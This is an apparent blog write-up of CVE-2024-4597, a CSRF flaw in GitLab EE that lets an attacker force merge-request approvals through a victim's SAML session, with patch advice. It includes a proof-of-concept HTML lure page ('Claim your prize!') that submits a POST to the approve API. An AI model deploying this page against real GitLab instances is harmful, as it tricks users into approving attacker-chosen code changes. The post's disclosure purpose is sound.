CVE-2024-4597 - GitLab EE Vulnerability Allows Attackers to Force MR Approval via CSRF Exploit

GitLab is a widely-used web-based platform for managing software development using Git for version control and collaboration. Recently, a security vulnerability (CVE-2024-4597) has been discovered, affecting GitLab Enterprise Edition (EE) versions 16.7 to 16.9.7, 16.10 to 16.10.5, and 16.11 to 16.11.2. This vulnerability allows an attacker to exploit a user's existing SAML session to approve a merge request (MR) through Cross-Site Request Forgery (CSRF).

In this post, we'll examine the exploit in detail, provide sample code that demonstrates the vulnerability, and point to original references for further study.

Exploit Details

The vulnerability exists due to insufficient CSRF protection in the SAML authentication process, specifically related to merge request approvals. An attacker can take advantage of a user's active SAML session to trick them into approving a malicious merge request.

To exploit this vulnerability, an attacker will need to craft an HTML page containing a form that submits a request to the GitLab instance to approve a merge request. The user with an active SAML session needs to visit that page and click on the bait provided by the attacker. The attacker can then send a link to the malicious page via email, social engineering, or other means.

Here's a code snippet demonstrating the exploit

<!DOCTYPE html>
<html>
<head>
<title>GitLab CSRF Exploit</title>
</head>
<body>
  <h1>Congratulations! You won a prize!</h1>
  <p>Click the button below to claim your reward:</p>
  <form action="https://your-gitlab-instance.com/api/v4/projects/your-project-id/merge_requests/your-mr-id/approve"; method="POST">
    <input type="submit" value="Claim your prize!" />
  </form>
</body>
</html>

your-mr-id: The ID of the merge request you want to be approved as an attacker.

Now, any user with an active SAML session that visits this page and clicks on the "Claim your prize!" button will inadvertently submit an approval request for the merge request specified in the form.

The official security release announcement can be found here

GitLab Security Release: 16.9.7, 16.10.5, and 16.11.2

It is strongly recommended that all GitLab administrators immediately update to the appropriate (fixed) version to protect their systems from potential attacks.

Conclusion

In this post, we have discussed the recently discovered GitLab EE vulnerability (CVE-2024-4597) and its impact. The issue allows an attacker to exploit a user's active SAML session into approving a merge request via CSRF. We provided an example of how the exploit works and outlined the recommended fixes and updates. Given the widespread use of GitLab for managing software projects, it is vital that administrators take action to ensure the security of their systems and users.

Timeline

Published on: 05/14/2024 15:44:10 UTC
Last modified on: 05/14/2024 16:11:39 UTC